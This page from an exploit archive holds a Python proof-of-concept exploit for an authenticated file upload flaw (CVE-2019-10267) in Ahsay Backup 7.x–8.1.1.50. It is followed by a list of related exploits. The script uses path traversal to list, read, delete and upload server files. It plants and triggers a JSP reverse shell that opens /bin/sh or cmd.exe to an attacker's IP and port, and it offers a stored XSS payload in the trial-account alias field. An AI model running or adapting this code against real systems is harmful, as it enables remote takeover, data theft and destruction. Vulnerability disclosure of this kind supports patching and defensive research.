Menu

Search for hundreds of thousands of exploits

"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution"

Author

"Wietse Boonstra"

Platform

jsp

Release date

2019-07-26

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (POC)
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x < 8.1.1.50
# Tested on: Windows / Linux
# CVE : CVE-2019-10267


#!/usr/bin/env python3

"""
# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. 
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x < 8.1.1.50 
# Tested on: Windows / Linux
# CVE : CVE-2019-10267

Session cookies are reflected in the JavaScript url: 

"""

import urllib3
import argparse
import base64
import re
import socket
from urllib.parse import urlencode
import gzip
import json
import hashlib

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def b64(s):
    try:
        return base64.b64encode(bytes(s, 'utf-8')).decode('utf-8')
    except:
        return base64.b64encode(bytes("", 'utf-8')).decode('utf-8')
     
def md5Sum(buf):
    hasher = hashlib.md5()
    hasher.update(buf)
    a = hasher.hexdigest()
    return a

class Exploit():
    def __init__(self, url, username="", password="", proxy="" ):
        self.url = url
        self.username = username
        self.password = password
        self.accountValid = None
        if proxy:
            self.http = urllib3.ProxyManager(proxy)
        else:
            self.http = urllib3.PoolManager()
        
    def fileActions(self, path="../../../../../../", action='list', recurse=False):
        """
        actions: download, list, delete, (upload  different function use self.upload)
        """
        try:
            if not self.checkAccount(self.username,self.password):
                return False
            if recurse:
                recurse = "true"
            else:
                recurse = "false"
            
            headers={
                'X-RSW-Request-1':	'{}'.format(b64(self.password)),
                'X-RSW-Request-0':	'{}'.format(b64(self.username))
            }
            # http = urllib3.ProxyManager("https://localhost:8080")
                
            path = {
                'X-RSW-custom-encode-path':'{}'.format(path),
                'recursive':'{}'.format(recurse)
                }
            path = urlencode(path)
            if action == "delete":
                r = self.http.request('DELETE', '{}/obs/obm7/file/{}?{}'.format(url,action,path),'',headers)
            else:
                r = self.http.request('GET', '{}/obs/obm7/file/{}?{}'.format(url,action,path),'',headers)
            if (r.status == 200):
                if (action == 'list'):
                    result = json.loads(gzip.decompress(r.data))
                    dash = '-' * 50
                    print(dash)
                    print('{:<11}{:<16}{:<20}'.format("Type", "Size","Name"))
                    print(dash)
                    for item in result["children"]:
                        print('{:<11}{:<16}{:<20}'.format(item['fsoType'], item['size'],item['name']))
                    print(dash) 
                else:
                    if action == "delete":
                        print ("File has been deleted")
                    else:
                        return (r.data.decode('utf-8'))
            else:
                print ("Something went wrong!")
                print (r.data)
                print (r.status)
        except Exception as e:
            print (e)
            pass

    def exploit(self, ip, port, uploadPath="../../webapps/cbs/help/en/", reverseShellFileName="test.jsp" ):
        """
        This function will setup the jsp reverse shell
        """
        if not self.checkAccount(self.username, self.password):
            return False

        reverseShell = '''<%@page import="java.lang.*"%>
            <%@page import="java.util.*"%>
            <%@page import="java.io.*"%>
            <%@page import="java.net.*"%>

            <%
            class StreamConnector extends Thread
            {{
                InputStream az;
                OutputStream jk;

                StreamConnector( InputStream az, OutputStream jk )
                {{
                this.az = az;
                this.jk = jk;
                }}

                public void run()
                {{
                BufferedReader vo  = null;
                BufferedWriter ijb = null;
                try
                {{
                    vo  = new BufferedReader( new InputStreamReader( this.az ) );
                    ijb = new BufferedWriter( new OutputStreamWriter( this.jk ) );
                    char buffer[] = new char[8192];
                    int length;
                    while( ( length = vo.read( buffer, 0, buffer.length ) ) > 0 )
                    {{
                    ijb.write( buffer, 0, length );
                    ijb.flush();
                    }}
                }} catch( Exception e ){{}}
                try
                {{
                    if( vo != null )
                    vo.close();
                    if( ijb != null )
                    ijb.close();
                }} catch( Exception e ){{}}
                }}
            }}

            try
            {{
                String ShellPath;
            if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {{
            ShellPath = new String("/bin/sh");
            }} else {{
            ShellPath = new String("cmd.exe");
            }}

                Socket socket = new Socket( "{0}", {1} );
                Process process = Runtime.getRuntime().exec( ShellPath );
                ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
                ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
            }} catch( Exception e ) {{}}
            %>'''.format(str(ip), str(port))

        try:
            if (uploadPath == "../../webapps/cbs/help/en/"):
                callUrl = "{}/{}{}".format(self.url,re.sub("^../../webapps/",'',uploadPath),reverseShellFileName)
            exploitUrl = "{}{}".format(uploadPath,reverseShellFileName)
            print (exploitUrl)
            self.upload(exploitUrl, reverseShell)
            print ("Checking if file is uploaded.")
            
            if (md5Sum(self.fileActions(exploitUrl,'download').encode('utf-8')) == md5Sum(reverseShell.encode('utf-8'))):
                print ("File content is the same, upload OK!")
                print ("Triggering {}".format(callUrl))
                # http = urllib3.ProxyManager("https://localhost:8080")
                r = self.http.request('GET', '{}'.format(callUrl))
                if r.status == 200:
                    print ("Done, Check your netcat listener!")
                return True
            else: 
                return False
        except Exception as e:
            print (e)
            return False

    def upload(self, filePath, fileContent ):
        """
        Needs a valid username and password.
        Needs a filepath + filename to upload to. 
        Needs the file content.
        """

        b64UploadPath = b64("{}".format(filePath))
        try:
            if not self.checkAccount(self.username, self.password):
                return False
            headers={
                'X-RSW-Request-0':	'{}'.format(b64(self.username)),
                'X-RSW-Request-1':	'{}'.format(b64(self.password)),
                'X-RSW-custom-encode-path': '{}'.format(b64UploadPath)
            }
            # http = urllib3.ProxyManager("https://localhost:8080")
            r = self.http.request(
                'PUT', 
                '{}/obs/obm7/file/upload'.format(self.url),
                body=fileContent,
                headers=headers)
            if (r.status == 201):
                print ("File {}".format(r.reason))
            else:
                print ("Something went wrong!")
                print (r.data)
                print (r.status)
        except Exception as e:
            print ("Something went wrong!")
            print (e)
            pass
    
    def checkAccount(self, username, password):
        try:
            headers={
                'X-RSW-custom-encode-password':	'{}'.format(b64(password)),
                'X-RSW-custom-encode-username':	'{}'.format(b64(username))
            }
            # http = urllib3.ProxyManager("https://localhost:8080")
            r = self.http.request('POST', '{}/obs/obm7/user/getUserProfile'.format(url),'',headers)
            if (r.data == b'CLIENT_TYPE_INCORRECT') or (r.status == 200):
                if self.accountValid is None:
                    print ("Account is valid with username: '{}' and password '{}'".format(username, password))
                self.accountValid = True
                return True
            elif (r.data == b'USER_NOT_EXIST'):
                if not self.accountValid is None:
                    print ("Username does not exist!")
                self.accountValid = False
                return False
            elif (r.data == b'PASSWORD_INCORRECT'):
                if self.accountValid is None:
                    print ("Password not correct but username '{}' is".format(username))
                self.accountValid = False
                return False
            else:
                if self.accountValid is None:
                    print ("Something went wrong!")
                self.accountValid = False
                return False
                # print (r.data)
                # print (r.status)
        except Exception as e:
            print (e)
            self.accountValid = False
            return False
            
    def checkTrialAccount(self):
        try:
            # http = urllib3.ProxyManager("https://localhost:8080")
            r = self.http.request('POST', '{}/obs/obm7/user/isTrialEnabled'.format(self.url),'','')
            if (r.status == 200 and r.data == b'ENABLED' ):
                print ("Server ({}) has Trial Account enabled, exploit should work!".format(self.url))
                return True
            else:
                print ("Server ({}) has Trial Account disabled, please use a valid account!".format(self.url))
                return False
        except Exception as e:
            print ("Something went wrong with url {} !".format(self.url))
            print (e)
            return False

    def addTrialAccount(self,alias=""):
        try:
            if not self.checkTrialAccount():
                return False
            
            headers={
                'X-RSW-custom-encode-alias':	'{}'.format(b64(alias)), 
                'X-RSW-custom-encode-password':	'{}'.format(b64(self.password)),
                'X-RSW-custom-encode-username':	'{}'.format(b64(self.username))
            }
            # http = urllib3.ProxyManager("https://localhost:8080")
            r = self.http.request('POST', '{}/obs/obm7/user/addTrialUser'.format(url),'',headers)
            if (r.status == 200):
                print ("Account '{}' created with password '{}'".format(username, password))
            elif (r.data == b'LOGIN_NAME_IS_USED'):
                print ("Username is in use!")
            elif (r.data == b'PWD_COMPLEXITY_FAILURE'):
                print ("Password not complex enough")
            else:
                print ("Something went wrong!")
                print (r.data)
                print (r.status)
        except Exception as e:
            print (e)
            pass


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        __file__,
        description="Exploit for AhsayCBS v6.x < v8.1.1..50",
        usage="""
    Check if Trial account is enabled: %(prog)s --host https://172.16.238.213/ -c
    Create Trial account: %(prog)s --host https://172.16.238.213/ -a -u test01 -p 'Welcome01!'
    Create Trial account with stored XSS: %(prog)s --host https://172.16.238.213/ -a -u test01 -p 'Welcome01!' -x --xssvalue "'><script>alert(1)</script>"
    Delete file: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! --action delete --path ../../../../../../../../test.txt
    List files in dir: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! --action list --path ../../../../../../../../
    Upload a file: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! --action upload --localfile test.txt --path ../../../../../../../../ --filename test.txt
    Upload reverse shell: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! -e --ip 172.16.238.1 --port 4444
        """
        
    )
    manda = parser.add_argument_group("Mandatory options")
    manda.add_argument("--host",
        help="Url of AhsayCBS server",
        # required=True
    )
    check = parser.add_argument_group("Check options")
    check.add_argument("-c", "--check",
        help="Check if host is vulnerable",
        action="store_true"
    )
    
    add = parser.add_argument_group("Add account options")
    add.add_argument("-a","--add",
        help="Add trial account",
        action="store_true"
    )
    add.add_argument("-u","--username",
        help="username to create"
    )
    add.add_argument("-p","--password",
        help="Password to create"
    )

    exploit = parser.add_argument_group("Exploit options")
    exploit.add_argument("-e", "--exploit",
        help="Run reverse shell exploit",
        action="store_true"
    )
    exploit.add_argument("--ip",
        help="Set the attackers IP",
        default="127.0.0.1"
    )
    exploit.add_argument("--port",
        help="Set the attackers port",
        default="4444"
    )

    #Optional
    xss = parser.add_argument_group("XSS")
    xss.add_argument("-x","--xss",
        help="Use XSS in alias field.",
        action="store_true",
        default=False
    )
    xss.add_argument("--xssvalue",
        help="Custom XSS value (must start with '>)",
        default="'><script>alert(1)</script>",
        required=False
    )
    

    # list files
    fileaction = parser.add_argument_group("File actions", "We can control the files on the server with 4 actions: list content of directory, download file (read), write file (upload) and delete file." )

    fileaction.add_argument("--action",
        help="use: delete, upload, download or list",
        default="list"
    )
    fileaction.add_argument("--localfile",
        help="Upload a local file"
    )
    fileaction.add_argument("--filename",
        help="Filename on the server"
    )
    fileaction.add_argument("--path",
        help="Directory on server use ../../../",
        default="/"
    )

    fileaction.add_argument("--recursive",
        help="Recurse actions list and delete",
        action="store_true",
        default=False
    )

    try:
        args = parser.parse_args()
        if args.add and (args.username is None or args.password is None):
            parser.error("The option --add / -a requires: --username and --password")
        if args.exploit and (args.username is None or args.password is None or args.ip is None or args.port is None):
            parser.error("The option -e / --exploit requires: --username, --password, --ip and --port")
        # if not (args.host or args.r7):
        if not (args.host):
            parser.error("The option --host requires: -a, -c, -e or -f")
        else:
            
            url = args.host
            url = url.rstrip('/')
            username = args.username
            password = args.password
            e = Exploit(url,username,password,"http://localhost:8080")
            if args.check:
                e.checkTrialAccount()
            elif args.add:
                if args.xss and (args.xssvalue is None):
                    parser.error("The option -x / --xss requires: --xssvalue")
                if args.xssvalue:
                    alias = args.xssvalue
                e.addTrialAccount(alias)
            elif args.exploit:
                print ("Exploiting please start a netcat listener on {}:{}".format(args.ip,args.port))
                input("Press Enter to continue...")
                e.exploit(args.ip, args.port,"../../webapps/cbs/help/en/","SystemSettings_License_Redirector_AHSAY.jsp")
            elif args.action != "upload":
                e.fileActions(args.path,args.action,args.recursive)
            elif args.action == "upload":
                if args.localfile is not None:
                    f = open(args.localfile, "r")
                    fileContent = f.read()
                    e.upload("{}{}".format(args.path,args.filename),fileContent)
                else:
                    parser.error("The option --upload must contain path to local file")
            
    except Exception as e:
        print (e)
        pass
Release Date Title Type Platform Author
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution" webapps jsp "Wietse Boonstra"
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
2019-02-19 "Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting" webapps jsp "Rafael Pedrero"
2019-02-18 "Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload" webapps jsp "Dao Duy Hung"
2018-10-30 "Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal" webapps jsp "Rafael Pedrero"
2018-04-16 "Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference" webapps jsp Frogy
2018-02-22 "Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities" webapps jsp "Core Security"
2017-10-09 "Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)" webapps jsp intx0x80
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-08-18 "Symantec Messaging Gateway 10.6.3-2 - Root Remote Command Execution" webapps jsp "Philip Pettersson"
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration" webapps jsp LiquidWorm
2017-08-01 "Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload" webapps jsp "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)" webapps jsp "James Fitts"
2017-07-19 "Oracle E-Business Suite 12.x - Server-Side Request Forgery" webapps jsp "Sarath Nair"
2017-04-25 "Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection" webapps jsp ERPScan
2017-03-27 "Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)" webapps jsp Sysdream
2017-05-24 "NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion" webapps jsp f3ci
2018-01-05 "Gespage 7.4.8 - SQL Injection" webapps jsp Sysdream
2017-03-10 "Kinsey Infor/Lawson / ESBUS - SQL Injection" webapps jsp "Michael Benich"
2017-02-23 "NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection" webapps jsp MrChaZ
2017-01-04 "Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting" webapps jsp "Jodson Santos"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47179/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47179/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47179/41559/ahsay-backup-7x-81150-authenticated-arbitrary-file-upload-remote-code-execution/download/", "exploit_id": "47179", "exploit_description": "\"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution\"", "exploit_date": "2019-07-26", "exploit_author": "\"Wietse Boonstra\"", "exploit_type": "webapps", "exploit_platform": "jsp", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse